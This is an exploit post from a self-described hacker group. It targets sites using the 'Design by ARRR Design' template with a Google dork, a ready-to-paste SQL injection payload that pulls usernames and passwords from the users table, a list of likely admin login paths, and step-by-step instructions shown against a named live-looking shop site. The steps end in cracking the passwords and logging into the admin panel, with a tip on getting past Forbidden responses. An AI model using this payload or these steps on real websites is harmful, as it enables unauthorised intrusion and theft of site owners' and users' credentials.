##################################################### Exploit Title: Design by ARRR Design Get Username & Password Exploit Author: ./MalingSendal - Trenggalek Cyber Army Dork : intext:"Design by ARRR Design" Date : 2016/10/07 Tested on : Win 10 ##################################################### Exploit : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ (If Forbidden You Can Use Hackbar Modif To Bypass it) ##################################################### Login Admin : http://www.site.com/adminweb http://www.site.com/admin http://www.site.com/login http://www.site.com/redaktur http://www.site.com/redakturweb http://www.site.com/administrator http://www.site.com/login@web http://www.site.com/adminpanel http://www.site.com/login http://www.site.com/admin ##################################################### POC : 1. Go to Google & Search The Dork 2. If You Already Get the Site ex : http://larisgrosir.com/kategori-45-properti.html 3. Put The Exploit ex : http://larisgrosir.com/kategori-45-properti.html ex : http://larisgrosir.com/kategori-45'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-properti.html 4. Yeah , In The Tiitle Will Appear The Username & Password 5. Crack The Password & Login in Admin Panel 6. Enjoy :) ##################################################### Trenggalek Cyber Army | facebook.com/officialtrenggalekcyberarmy/ Greetz : CowoKerensTeam - Sanjungan Jiwa - IndoXploit - All Hacker Indonesia | -> Stay Cool & Fuck Xai Syndicate <-